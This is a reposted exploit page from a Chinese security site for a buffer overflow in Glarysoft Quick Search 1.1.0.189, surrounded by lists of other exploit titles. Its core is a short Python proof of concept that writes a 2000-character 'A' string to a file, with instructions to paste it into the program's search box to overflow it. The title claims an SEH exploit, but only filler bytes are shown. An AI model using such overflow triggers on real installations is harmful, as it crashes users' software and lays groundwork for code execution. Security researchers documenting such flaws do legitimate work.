首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quick Search Version 1.1.0.189 Buffer Overflow Vulnerability (SEH)
来源:http://ariarat.blogspot.com 作者:ariarat 发布时间:2013-05-16  

# Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)
# Date: 14-05-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: http://download.glarysoft.com/qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in Search section.for better results bring program in Full Mode and in Edit
# menu choose Match Path and then paste your string.  
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "\x41" * 2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kloxo 6.1.12 Privilege Escalat
·Serva 32 TFTP 2.1.0 - Buffer O
·ERS Viewer 2011 ERS File Handl
·SSH User Code Execution
·Avira Personal Privilege Escal
·Mutiny 5 Arbitrary File Upload
·Linux PERF_EVENTS Local Root
·Nginx 1.3.9 / 1.4.0 Denial Of
·Kloxo 6.1.6 - Local Privilege
·Glibc 2.11.3 / 2.12.x LD_AUDIT
·No-IP Dynamic Update Client (D
·D-Link DIR615h OS Command Inje
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved